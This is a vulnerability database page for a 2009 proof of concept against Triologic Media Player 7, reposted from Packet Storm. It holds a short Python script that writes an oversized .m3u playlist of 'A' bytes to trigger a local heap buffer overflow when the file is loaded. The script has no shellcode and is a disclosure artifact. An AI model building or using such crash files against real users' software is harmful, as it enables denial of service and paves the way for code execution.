Lucene search

K

Triologic Media Player 7 Heap Overflow

🗓️ 12 Jan 2009 00:00:00Reported by zAxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Triologic Media Player 7 Heap Overflow vulnerability proof of concep

Show more
Code
`# IN THE NAME OF ALLAH :)  
#!/usr/bin/python  
# Discovered By : zAx  
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol  
  
print "**************************************************************************"  
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"  
print " Discovered By : zAx\n"  
print " [email protected]\n"  
print " In that PoC thanks for : Stack ;) My BrOthEr :)"  
print "**************************************************************************"  
  
overflow = "\x41" * 3000 # not right, just a PoC  
  
try:  
out_file = open("zAx.m3u",'w')  
out_file.write(overflow)  
out_file.close()  
raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")  
except:  
print "Error"  
# EoF  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Jan 2009 00:00Current
0.7Low risk
Vulners AI Score0.7
18
.json
Report